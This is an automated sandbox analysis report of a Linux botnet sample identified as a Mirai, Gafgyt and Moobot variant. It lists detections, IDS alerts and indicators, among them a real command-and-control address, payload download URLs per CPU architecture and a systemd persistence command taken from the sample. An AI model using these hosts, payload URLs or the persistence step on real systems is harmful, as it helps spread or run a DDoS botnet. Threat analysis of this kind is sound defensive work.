Edit tour

Linux Analysis Report
na.elf

Overview

General Information

Sample name:	na.elf
Analysis ID:	1528133
MD5:	ecffaf9ddeb2137988036bf8d7153b67
SHA1:	834a8cce9907e2ce918040cef2944f5d1dcb0d08
SHA256:	1afd5b2da3e7a198208d882e61c3c651b7718ce9d67a4c6f0c2c882492f7eb41
Tags:	elfuser-abuse_ch
Infos:

Detection

Mirai, Gafgyt, Moobot, Okiru

Score:	100
Range:	0 - 100
Whitelisted:	false

Signatures

Antivirus / Scanner detection for submitted sample

Detected Mirai

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Gafgyt

Yara detected Moobot

Yara detected Okiru

Connects to many ports of the same IP (likely port scanning)

Detected TCP or UDP traffic on non-standard ports

Executes commands using a shell command-line interpreter

Executes the "systemctl" command used for controlling the systemd system and service manager

Found strings indicative of a multi-platform dropper

Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable

Sample has stripped symbol table

Uses the "uname" system call to query kernel version information (possible evasion)

Classification

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1528133
Start date and time:	2024-10-07 16:28:04 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 7s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultlinuxfilecookbook.jbs
Analysis system description:	Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:	default
Sample name:	na.elf
Detection:	MAL
Classification:	mal100.troj.linELF@0/3@30/0

Runtime Messages

Command:	/tmp/na.elf
PID:	5490
Exit Code:	0
Exit Code Info:
Killed:	False
Standard Output:	bolu_botnet_done.
Standard Error:

Process Tree

system is lnxubuntu20

na.elf (PID: 5490, Parent: 5414, MD5: 0083f1f0e77be34ad27f849842bbb00c) Arguments: /tmp/na.elf

na.elf New Fork (PID: 5492, Parent: 5490)

na.elf New Fork (PID: 5494, Parent: 5490)

sh (PID: 5494, Parent: 5490, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "systemctl enable sbolo.service > /dev/null 2>&1"

sh New Fork (PID: 5496, Parent: 5494)

systemctl (PID: 5496, Parent: 5494, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl enable sbolo.service

na.elf New Fork (PID: 5500, Parent: 5490)

systemd New Fork (PID: 5498, Parent: 5497)

snapd-env-generator (PID: 5498, Parent: 5497, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Mirai	Mirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.	No Attribution	http://osint.bambenekconsulting.com/feeds/ http://www.simonroses.com/2016/10/mirai-ddos-botnet-source-code-binary-analysis/ https://blog.malwaremustdie.org/2020/02/mmd-0065-2021-linuxmirai-fbot-re.html https://blog.netlab.360.com/another-lilin-dvr-0-day-being-used-to-spread-mirai-en/ https://blog.netlab.360.com/mirai_ptea-botnet-is-exploiting-undisclosed-kguard-dvr-vulnerability-en/	https://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai

Name	Description	Attribution	Blogpost URLs	Link
Bashlite, Gafgyt	Bashlite is a malware family which infects Linux systems in order to launch distributed denial-of-service attacks (DDoS). Originally it was also known under the name Bashdoor, but this term now refers to the exploit method used by the malware. It has been used to launch attacks of up to 400 Gbps.	No Attribution	http://blog.trendmicro.com/trendlabs-security-intelligence/bashlite-affects-devices-running-on-busybox/ https://blog.cyber5w.com/gafgyt-backdoor-analysis https://blog.netlab.360.com/gafgtyt_tor-and-necro-are-on-the-move-again/ https://blog.netlab.360.com/public-cloud-threat-intelligence-202203/ https://blog.netlab.360.com/some_details_of_the_ddos_attacks_targeting_ukraine_and_russia_in_recent_days/	https://malpedia.caad.fkie.fraunhofer.de/details/elf.bashlite

Name	Description	Attribution	Blogpost URLs	Link
MooBot		No Attribution	https://blog.netlab.360.com/ddos-botnet-moobot-en/ https://blog.netlab.360.com/moobot-0day-unixcctv-dvr-en/ https://blog.netlab.360.com/some_details_of_the_ddos_attacks_targeting_ukraine_and_russia_in_recent_days/ https://media.defense.gov/2024/Feb/27/2003400753/-1/-1/0/CSA-RUSSIAN-ACTORS-USE-ROUTERS-FACILITATE-CYBER_OPERATIONS.PDF https://otx.alienvault.com/pulse/6075b645942d5adf9bb8949b	https://malpedia.caad.fkie.fraunhofer.de/details/elf.moobot

Yara Signatures

Initial Sample

Source	Rule	Description	Author
na.elf	JoeSecurity_Gafgyt	Yara detected Gafgyt	Joe Security
na.elf	JoeSecurity_Okiru	Yara detected Okiru	Joe Security
na.elf	JoeSecurity_Moobot	Yara detected Moobot	Joe Security

Memory Dumps

Source	Rule	Description	Author
5490.1.00007f28c4400000.00007f28c4429000.r-x.sdmp	JoeSecurity_Gafgyt	Yara detected Gafgyt	Joe Security
5490.1.00007f28c4400000.00007f28c4429000.r-x.sdmp	JoeSecurity_Okiru	Yara detected Okiru	Joe Security
5490.1.00007f28c4400000.00007f28c4429000.r-x.sdmp	JoeSecurity_Moobot	Yara detected Moobot	Joe Security
Process Memory Space: na.elf PID: 5490	JoeSecurity_Okiru	Yara detected Okiru	Joe Security
Process Memory Space: na.elf PID: 5490	JoeSecurity_Moobot	Yara detected Moobot	Joe Security

Suricata Signatures

ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-07T16:28:53.058288+0200	2030490	1	Malware Command and Control Activity Detected	192.168.2.14	58430	91.200.103.117	23561	TCP
2024-10-07T16:28:58.707877+0200	2030490	1	Malware Command and Control Activity Detected	192.168.2.14	58432	91.200.103.117	23561	TCP
2024-10-07T16:29:03.667039+0200	2030490	1	Malware Command and Control Activity Detected	192.168.2.14	58434	91.200.103.117	23561	TCP
2024-10-07T16:29:09.389345+0200	2030490	1	Malware Command and Control Activity Detected	192.168.2.14	58436	91.200.103.117	23561	TCP
2024-10-07T16:29:18.398905+0200	2030490	1	Malware Command and Control Activity Detected	192.168.2.14	58438	91.200.103.117	23561	TCP
2024-10-07T16:29:27.047574+0200	2030490	1	Malware Command and Control Activity Detected	192.168.2.14	58440	91.200.103.117	23561	TCP
2024-10-07T16:29:32.707714+0200	2030490	1	Malware Command and Control Activity Detected	192.168.2.14	58442	91.200.103.117	23561	TCP
2024-10-07T16:29:42.335065+0200	2030490	1	Malware Command and Control Activity Detected	192.168.2.14	58444	91.200.103.117	23561	TCP
2024-10-07T16:29:49.970562+0200	2030490	1	Malware Command and Control Activity Detected	192.168.2.14	58446	91.200.103.117	23561	TCP
2024-10-07T16:30:00.652513+0200	2030490	1	Malware Command and Control Activity Detected	192.168.2.14	58448	91.200.103.117	23561	TCP
2024-10-07T16:30:11.483573+0200	2030490	1	Malware Command and Control Activity Detected	192.168.2.14	58450	91.200.103.117	23561	TCP
2024-10-07T16:30:19.141822+0200	2030490	1	Malware Command and Control Activity Detected	192.168.2.14	58452	91.200.103.117	23561	TCP
2024-10-07T16:30:25.773355+0200	2030490	1	Malware Command and Control Activity Detected	192.168.2.14	58454	91.200.103.117	23561	TCP
2024-10-07T16:30:32.421776+0200	2030490	1	Malware Command and Control Activity Detected	192.168.2.14	58456	91.200.103.117	23561	TCP
2024-10-07T16:30:43.097400+0200	2030490	1	Malware Command and Control Activity Detected	192.168.2.14	58458	91.200.103.117	23561	TCP
2024-10-07T16:30:53.732411+0200	2030490	1	Malware Command and Control Activity Detected	192.168.2.14	58460	91.200.103.117	23561	TCP
2024-10-07T16:30:58.403261+0200	2030490	1	Malware Command and Control Activity Detected	192.168.2.14	58462	91.200.103.117	23561	TCP
2024-10-07T16:31:04.045222+0200	2030490	1	Malware Command and Control Activity Detected	192.168.2.14	58464	91.200.103.117	23561	TCP
2024-10-07T16:31:07.698392+0200	2030490	1	Malware Command and Control Activity Detected	192.168.2.14	58466	91.200.103.117	23561	TCP
2024-10-07T16:31:16.376213+0200	2030490	1	Malware Command and Control Activity Detected	192.168.2.14	58468	91.200.103.117	23561	TCP
2024-10-07T16:31:21.699517+0200	2030490	1	Malware Command and Control Activity Detected	192.168.2.14	58470	91.200.103.117	23561	TCP
2024-10-07T16:31:29.329455+0200	2030490	1	Malware Command and Control Activity Detected	192.168.2.14	58472	91.200.103.117	23561	TCP
2024-10-07T16:31:38.374808+0200	2030490	1	Malware Command and Control Activity Detected	192.168.2.14	58474	91.200.103.117	23561	TCP
2024-10-07T16:31:44.860656+0200	2030490	1	Malware Command and Control Activity Detected	192.168.2.14	58476	91.200.103.117	23561	TCP
2024-10-07T16:31:47.518777+0200	2030490	1	Malware Command and Control Activity Detected	192.168.2.14	58478	91.200.103.117	23561	TCP
2024-10-07T16:31:59.490488+0200	2030490	1	Malware Command and Control Activity Detected	192.168.2.14	58480	91.200.103.117	23561	TCP
2024-10-07T16:32:05.266675+0200	2030490	1	Malware Command and Control Activity Detected	192.168.2.14	58482	91.200.103.117	23561	TCP
2024-10-07T16:32:17.530926+0200	2030490	1	Malware Command and Control Activity Detected	192.168.2.14	58484	91.200.103.117	23561	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: na.elf

Avira: detected

Multi AV Scanner detection for submitted file

Source: na.elf

ReversingLabs: Detection: 52%

Source: na.elf

String: HTTP/1.1 200 OKbolubotnetarmbolubotnetarm5bolubotnetarm6bolubotnetarm7bolubotnetmipsbolubotnetmpslbolubotnetx86_64bolubotnetsh4abcdefghijklmnopqrstuvwxyz/proc/%d/exe/tmp/%s%s%c/proc/self/cmdline/proc/%d/proc/self/proc/proc/%d/cmdlinernetstatwgetcurlbusybox/bin/busybox/proc//proc/%s/exe/proc/self/exevar/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/guivar/Kylinl0 c/udevdanko-app/ankosample _8182T_1104var/tmp/soniahicorestm_hi3511_dvr/usr/lib/systemd/systemd/usr/libexec/openssh/sftp-serverusr/shellmnt/sys/bin/boot/media/apache2srv/var/run/sbin/lib/etc/dev/home/Davincitelnetsshwatchdog/var/spoolsshd/usr/compress/bin//compress/bin/compress/usr/bashhttpdtelnetddropbearropbearencodersystem/root/dvr_gui//root/dvr_app//anko-app//opt/.x86.x86_64.arm.arm5.arm6.arm7.mips.mipsel.sh4.ppcx86x86_64armarm5arm6arm7mipsmipselsh4ppcx86.x86_64.arm.arm5.arm6.arm7.mips.mipsel.sh4.ppc.abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ/etc/systemd/system/sbolo.servicew[Unit]

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.14:58442 -> 91.200.103.117:23561
Source: Network traffic	Suricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.14:58446 -> 91.200.103.117:23561
Source: Network traffic	Suricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.14:58432 -> 91.200.103.117:23561
Source: Network traffic	Suricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.14:58440 -> 91.200.103.117:23561
Source: Network traffic	Suricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.14:58444 -> 91.200.103.117:23561
Source: Network traffic	Suricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.14:58470 -> 91.200.103.117:23561
Source: Network traffic	Suricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.14:58438 -> 91.200.103.117:23561
Source: Network traffic	Suricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.14:58430 -> 91.200.103.117:23561
Source: Network traffic	Suricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.14:58448 -> 91.200.103.117:23561
Source: Network traffic	Suricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.14:58434 -> 91.200.103.117:23561
Source: Network traffic	Suricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.14:58458 -> 91.200.103.117:23561
Source: Network traffic	Suricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.14:58478 -> 91.200.103.117:23561
Source: Network traffic	Suricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.14:58452 -> 91.200.103.117:23561
Source: Network traffic	Suricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.14:58464 -> 91.200.103.117:23561
Source: Network traffic	Suricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.14:58454 -> 91.200.103.117:23561
Source: Network traffic	Suricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.14:58480 -> 91.200.103.117:23561
Source: Network traffic	Suricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.14:58456 -> 91.200.103.117:23561
Source: Network traffic	Suricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.14:58482 -> 91.200.103.117:23561
Source: Network traffic	Suricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.14:58450 -> 91.200.103.117:23561
Source: Network traffic	Suricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.14:58484 -> 91.200.103.117:23561
Source: Network traffic	Suricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.14:58468 -> 91.200.103.117:23561
Source: Network traffic	Suricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.14:58436 -> 91.200.103.117:23561
Source: Network traffic	Suricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.14:58466 -> 91.200.103.117:23561
Source: Network traffic	Suricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.14:58472 -> 91.200.103.117:23561
Source: Network traffic	Suricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.14:58474 -> 91.200.103.117:23561
Source: Network traffic	Suricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.14:58462 -> 91.200.103.117:23561
Source: Network traffic	Suricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.14:58476 -> 91.200.103.117:23561
Source: Network traffic	Suricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.14:58460 -> 91.200.103.117:23561

Connects to many ports of the same IP (likely port scanning)

Source: global traffic

TCP traffic: 91.200.103.117 ports 1,2,3,5,6,23561

Source: global traffic

TCP traffic: 192.168.2.14:58430 -> 91.200.103.117:23561

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	DNS traffic detected: DNS query: yi0key.heleh.com.vn
Source: global traffic	DNS traffic detected: DNS query: daisy.ubuntu.com

Source: na.elf	String found in binary or memory: http://91.200.103.117/%s
Source: na.elf, 5490.1.00007f28c446e000.00007f28c4479000.rw-.sdmp, sbolo.service.12.dr	String found in binary or memory: http://91.200.103.117/bolubotnetmips

Source: Initial sample	String containing 'busybox' found: busybox
Source: Initial sample	String containing 'busybox' found: /bin/busybox
Source: Initial sample	String containing 'busybox' found: HTTP/1.1 200 OKbolubotnetarmbolubotnetarm5bolubotnetarm6bolubotnetarm7bolubotnetmipsbolubotnetmpslbolubotnetx86_64bolubotnetsh4abcdefghijklmnopqrstuvwxyz/proc/%d/exe/tmp/%s%s%c/proc/self/cmdline/proc/%d/proc/self/proc/proc/%d/cmdlinernetstatwgetcurlbusybox/bin/busybox/proc//proc/%s/exe/proc/self/exevar/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/guivar/Kylinl0 c/udevdanko-app/ankosample _8182T_1104var/tmp/soniahicorestm_hi3511_dvr/usr/lib/systemd/systemd/usr/libexec/openssh/sftp-serverusr/shellmnt/sys/bin/boot/media/apache2srv/var/run/sbin/lib/etc/dev/home/Davincitelnetsshwatchdog/var/spoolsshd/usr/compress/bin//compress/bin/compress/usr/bashhttpdtelnetddropbearropbearencodersystem/root/dvr_gui//root/dvr_app//anko-app//opt/.x86.x86_64.arm.arm5.arm6.arm7.mips.mipsel.sh4.ppcx86x86_64armarm5arm6arm7mipsmipselsh4ppcx86.x86_64.arm.arm5.arm6.arm7.mips.mipsel.sh4.ppc.abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ/etc/systemd/system/sbolo.servicew[Unit]

Source: ELF static info symbol of initial sample

.symtab present: no

Source: classification engine

Classification label: mal100.troj.linELF@0/3@30/0

Source: /tmp/na.elf (PID: 5494)

Shell command executed: sh -c "systemctl enable sbolo.service > /dev/null 2>&1"

Jump to behavior

Source: /bin/sh (PID: 5496)

Systemctl executable: /usr/bin/systemctl -> systemctl enable sbolo.service

Jump to behavior

Source: /tmp/na.elf (PID: 5490)

Queries kernel information via 'uname':

Jump to behavior

Source: na.elf, 5490.1.000055929b867000.000055929b8ee000.rw-.sdmp	Binary or memory string: U!/etc/qemu-binfmt/mips
Source: na.elf, 5490.1.000055929b867000.000055929b8ee000.rw-.sdmp	Binary or memory string: /etc/qemu-binfmt/mips
Source: na.elf, 5490.1.00007ffdfcea4000.00007ffdfcec5000.rw-.sdmp	Binary or memory string: /usr/bin/qemu-mips
Source: na.elf, 5490.1.00007ffdfcea4000.00007ffdfcec5000.rw-.sdmp	Binary or memory string: qx86_64/usr/bin/qemu-mips/tmp/na.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/na.elf

Stealing of Sensitive Information

Yara detected Gafgyt

Source: Yara match	File source: na.elf, type: SAMPLE
Source: Yara match	File source: 5490.1.00007f28c4400000.00007f28c4429000.r-x.sdmp, type: MEMORY

Yara detected Moobot

Source: Yara match	File source: na.elf, type: SAMPLE
Source: Yara match	File source: 5490.1.00007f28c4400000.00007f28c4429000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: na.elf PID: 5490, type: MEMORYSTR

Yara detected Okiru

Source: Yara match	File source: na.elf, type: SAMPLE
Source: Yara match	File source: 5490.1.00007f28c4400000.00007f28c4429000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: na.elf PID: 5490, type: MEMORYSTR

Remote Access Functionality

Detected Mirai

Source: Traffic	Suricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
Source: Traffic	Suricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
Source: Traffic	Suricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
Source: Traffic	Suricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
Source: Traffic	Suricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
Source: Traffic	Suricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
Source: Traffic	Suricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
Source: Traffic	Suricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
Source: Traffic	Suricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
Source: Traffic	Suricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
Source: Traffic	Suricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
Source: Traffic	Suricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
Source: Traffic	Suricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
Source: Traffic	Suricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
Source: Traffic	Suricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
Source: Traffic	Suricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
Source: Traffic	Suricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
Source: Traffic	Suricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
Source: Traffic	Suricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
Source: Traffic	Suricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
Source: Traffic	Suricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
Source: Traffic	Suricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
Source: Traffic	Suricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
Source: Traffic	Suricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
Source: Traffic	Suricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
Source: Traffic	Suricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
Source: Traffic	Suricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
Source: Traffic	Suricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)

Yara detected Gafgyt

Source: Yara match	File source: na.elf, type: SAMPLE
Source: Yara match	File source: 5490.1.00007f28c4400000.00007f28c4429000.r-x.sdmp, type: MEMORY

Yara detected Moobot

Source: Yara match	File source: na.elf, type: SAMPLE
Source: Yara match	File source: 5490.1.00007f28c4400000.00007f28c4429000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: na.elf PID: 5490, type: MEMORYSTR

Yara detected Okiru

Source: Yara match	File source: na.elf, type: SAMPLE
Source: Yara match	File source: 5490.1.00007f28c4400000.00007f28c4429000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: na.elf PID: 5490, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	2 Scripting	Valid Accounts	Windows Management Instrumentation	1 Systemd Service	1 Systemd Service	Direct Volume Access	OS Credential Dumping	11 Security Software Discovery	Remote Services	Data from Local System	1 Non-Standard Port	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	2 Scripting	Boot or Logon Initialization Scripts	Rootkit	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	1 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact

Malware Configuration

⊘No configs have been found

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Number of created Files
Is malicious
Internet

Source	Detection	Scanner	Label	Link
na.elf	53%	ReversingLabs	Linux.Backdoor.Mirai
na.elf	100%	Avira	EXP/ELF.Agent.J.8

Name	IP	Active	Malicious	Antivirus Detection	Reputation
daisy.ubuntu.com	162.213.35.25	true	false		unknown
yi0key.heleh.com.vn	91.200.103.117	true	true		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://91.200.103.117/%s	na.elf	false		unknown
http://91.200.103.117/bolubotnetmips	na.elf, 5490.1.00007f28c446e000.00007f28c4479000.rw-.sdmp, sbolo.service.12.dr	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
91.200.103.117	yi0key.heleh.com.vn	Germany		30823	COMBAHTONcombahtonGmbHDE	true

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
91.200.103.117	na.elf	Get hash	malicious	Mirai, Gafgyt, Moobot, Okiru	Browse
	na.elf	Get hash	malicious	Mirai, Moobot, Okiru	Browse
	na.elf	Get hash	malicious	Mirai, Gafgyt, Moobot, Okiru	Browse
	na.elf	Get hash	malicious	Mirai, Gafgyt, Moobot, Okiru	Browse
	na.elf	Get hash	malicious	Mirai, Gafgyt, Moobot, Okiru	Browse
	na.elf	Get hash	malicious	Mirai, Gafgyt, Moobot, Okiru	Browse
	na.elf	Get hash	malicious	Mirai, Gafgyt, Moobot, Okiru	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
daisy.ubuntu.com	na.elf	Get hash	malicious	Mirai, Gafgyt, Moobot, Okiru	Browse	162.213.35.25
	na.elf	Get hash	malicious	Unknown	Browse	162.213.35.25
	na.elf	Get hash	malicious	Mirai, Gafgyt, Moobot, Okiru	Browse	162.213.35.25
	na.elf	Get hash	malicious	Unknown	Browse	162.213.35.25
	na.elf	Get hash	malicious	Gafgyt	Browse	162.213.35.25
	na.elf	Get hash	malicious	Mirai, Gafgyt, Moobot, Okiru	Browse	162.213.35.24
	na.elf	Get hash	malicious	Gafgyt	Browse	162.213.35.25
	na.elf	Get hash	malicious	Mirai, Gafgyt, Moobot, Okiru	Browse	162.213.35.25
	na.elf	Get hash	malicious	Mirai, Gafgyt, Moobot, Okiru	Browse	162.213.35.24
	na.elf	Get hash	malicious	Unknown	Browse	162.213.35.25
yi0key.heleh.com.vn	na.elf	Get hash	malicious	Mirai, Gafgyt, Moobot, Okiru	Browse	91.200.103.117
	na.elf	Get hash	malicious	Mirai, Moobot, Okiru	Browse	91.200.103.117
	na.elf	Get hash	malicious	Mirai, Gafgyt, Moobot, Okiru	Browse	91.200.103.117
	na.elf	Get hash	malicious	Mirai, Gafgyt, Moobot, Okiru	Browse	91.200.103.117
	na.elf	Get hash	malicious	Mirai, Gafgyt, Moobot, Okiru	Browse	91.200.103.117
	na.elf	Get hash	malicious	Mirai, Gafgyt, Moobot, Okiru	Browse	91.200.103.117
	na.elf	Get hash	malicious	Mirai, Gafgyt, Moobot, Okiru	Browse	91.200.103.117

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
